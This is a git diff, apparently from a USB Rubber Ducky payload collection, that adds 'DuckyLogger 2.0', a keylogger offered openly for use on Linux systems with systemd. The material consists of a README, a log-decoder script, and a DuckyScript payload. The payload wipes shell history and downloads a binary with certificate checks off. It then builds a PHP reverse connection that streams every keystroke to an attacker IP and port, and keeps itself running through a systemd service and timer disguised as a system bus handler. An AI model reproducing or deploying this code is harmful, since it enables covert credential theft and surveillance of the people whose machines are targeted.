Merge branch 'hak5:master' into master
commit
3a216241d8
|
@ -0,0 +1,56 @@
|
|||
## About:
|
||||
* Title: DuckyLogger 2.0
|
||||
* Description: Keylogger, which sends each and every keystroke of the target remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 2.0
|
||||
* Category: Credentials.
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID.
|
||||
|
||||
## DuckyLogger 2.0 is the most efficient version of the original DuckyLogger, which captures every keystroke of the traget and sends it back to the attacker.
|
||||
|
||||
### Features:
|
||||
* Live keystroke capturing.
|
||||
* Detailed key logs.
|
||||
* Persistent.
|
||||
* Autostart payload on boot.
|
||||
|
||||
### What's new ?
|
||||
* No trigger from the target's end is required.
|
||||
* Completely autostarts the payload on boot.
|
||||
* Removed unnecessary script blocks.
|
||||
* No need to run two different services.
|
||||
|
||||
### Workflow:
|
||||
* Encoding payload and injecting it into the target's system.
|
||||
* Checks whether the internet is connected to the target system.
|
||||
* If the internet is connected, then it sends raw keystrokes to the attacker.
|
||||
* Attacker processes raw keystrokes.
|
||||
|
||||
### Changes to be made in payload:
|
||||
* Replace ip (0.0.0.0) and port number (4444) with your server's ip address and port number on line no. `43`.
|
||||
* Increase/Decrease time interval to restart service periodically (default is 5 minutes), on line no. `59`.
|
||||
|
||||
### Usage:
|
||||
1. Encode payload.txt and inject it into the target's system.
|
||||
2. Start Netcat listner on the attacking system:
|
||||
|
||||
* `nc -lvp <port number> > <log filename>` use this command to create new a logfile with raw keystrokes.
|
||||
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to an existing log file.
|
||||
3. Process raw keystrokes using the DuckyLoggerDecoder utility:
|
||||
```
|
||||
./duckyLoggerDecoder
|
||||
DuckyLoggerDecoder is used to decode raw key strokes acquired by duckyLogger.
|
||||
|
||||
Usage:
|
||||
Decode captured log: [./duckyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
|
||||
|
||||
Options:
|
||||
-f Specify the log file.
|
||||
-m Select Mode(normal|informative)
|
||||
-o Specify an output file.
|
||||
-h For this banner.
|
||||
```
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,50 @@
|
|||
usage () {
|
||||
echo -e "\nDuckyLoggerDecoder is used to decode raw key strokes acquired by DuckyLogger.\n"
|
||||
echo -e "Usage: \nDecode captured logs:\t[./duckyLoggerDecoder -f <log file> -m <mode> -o <output file>]";
|
||||
echo -e "\nOptions:"
|
||||
echo -e "-f\tSpecify the log file."
|
||||
echo -e "-m\tSelect Mode(normal|informative)"
|
||||
echo -e "-o\tSpecify an output file."
|
||||
echo -e "-h\tFor this banner."
|
||||
}
|
||||
while getopts o:m:f:h: flag
|
||||
do
|
||||
case "${flag}" in
|
||||
o) output=$OPTARG ;;
|
||||
m) mode=$OPTARG ;;
|
||||
f) filename=$OPTARG ;;
|
||||
h) help=$OPTARG ;;
|
||||
*)
|
||||
usage
|
||||
exit 1
|
||||
esac
|
||||
done
|
||||
|
||||
if [ -z "$output" ] && [ -z "$filename" ]; then
|
||||
usage
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$filename" ]; then
|
||||
echo -e "DuckyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$output" ]; then
|
||||
echo -e "DuckyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$mode" ]; then
|
||||
echo -e "DuckyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
|
||||
echo -e "DuckyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" == "normal" ] ; then
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" == "informative" ] ; then
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
|
||||
exit 1
|
||||
fi
|
|
@ -0,0 +1,74 @@
|
|||
REM Title: DuckyLogger 2.0
|
||||
REM Description: Keylogger which sends each and every keystroke of the target remotely/locally.
|
||||
REM AUTHOR: drapl0n
|
||||
REM Version: 2.0
|
||||
REM Category: Credentials
|
||||
REM Target: Unix-like operating systems with systemd.
|
||||
REM Attackmodes: HID
|
||||
|
||||
REM [Note]
|
||||
REM Visit https://github.com/drapl0n/DuckyLogger2/README.md for usage and other important instructions.
|
||||
|
||||
REM [keeping tracks clear]
|
||||
DELAY 500
|
||||
CTRL-ALT t
|
||||
DELAY 400
|
||||
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM [creating key logging mechanism]
|
||||
STRING mkdir /var/tmp/.system
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING chmod +x /var/tmp/.system/sys
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM [importing xinput]
|
||||
STRING cd /var/tmp/.system/
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
|
||||
ENTER
|
||||
DELAY 2500
|
||||
STRING chmod +x xinput
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM [creating reverse shell]
|
||||
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING chmod +x /var/tmp/.system/systemBus
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM [creating systemd service to execute payload on boot]
|
||||
STRING mkdir -p ~/.config/systemd/user
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=always\nType=forking\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM [creating systemd timer unit]
|
||||
STRING echo -e "[Unit]\nDescription= SystemBUS Timer\n\n[Timer]\nOnBootSec=60seconds\nOnUnitActiveSec=300seconds\n\n[Install]\nWantedBy=timers.target" > ~/.config/systemd/user/systemBUS.timer
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
REM [enabling service]
|
||||
STRING systemctl --user daemon-reload
|
||||
ENTER
|
||||
DELAY 300
|
||||
STRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer
|
||||
ENTER
|
||||
DELAY 150
|
||||
STRING systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer
|
||||
ENTER
|
||||
DELAY 150
|
||||
STRING exit
|
||||
ENTER
|
Loading…
Reference in New Issue